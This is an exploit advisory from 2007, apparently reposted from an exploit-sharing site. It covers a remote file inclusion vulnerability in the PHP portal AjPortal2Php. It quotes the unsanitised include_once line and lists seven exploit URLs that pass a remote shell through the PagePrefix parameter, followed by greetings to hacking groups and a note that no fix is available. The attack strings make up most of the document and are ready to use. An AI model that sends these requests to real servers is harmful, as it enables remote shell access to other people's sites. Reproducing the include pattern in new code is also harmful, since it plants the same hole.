AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities

2007-04-17 00:00:00

# [ AjPortal2Php]

# Class: File Include Vulnerability

# Remote: Yes

# Site: http://www.ajlopez.com/downloads/AjPortal2Php.zip

# Author: Alkomandoz Hacker

# Contact: [email protected]

#############################################################

file ;

begin.inc.php
connection.inc.php
events.inc.php
footer.inc.php
header.inc.php
menuleft.inc.php
pages.inc.php


======================================================
Vuln Code

include_once($PagePrefix.'includes/configuration.inc.php');



=======================================================
Exploit :

[AjPortal2Php _path]/includes/begin.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/connection.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/events.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/footer.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/header.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/menuleft.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/pages.inc.php?PagePrefix=Shell



---- Thanx: [HaCk.eGy] [Mahmood_ali] [Dr.aSiEr H@Ck] [ AsB-MaY GrOuPs ] [CiTy Of GhOsTs]

---- GreeTz: All www.Asb-May.Net & WwW.MoHaNdKo.CoM

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.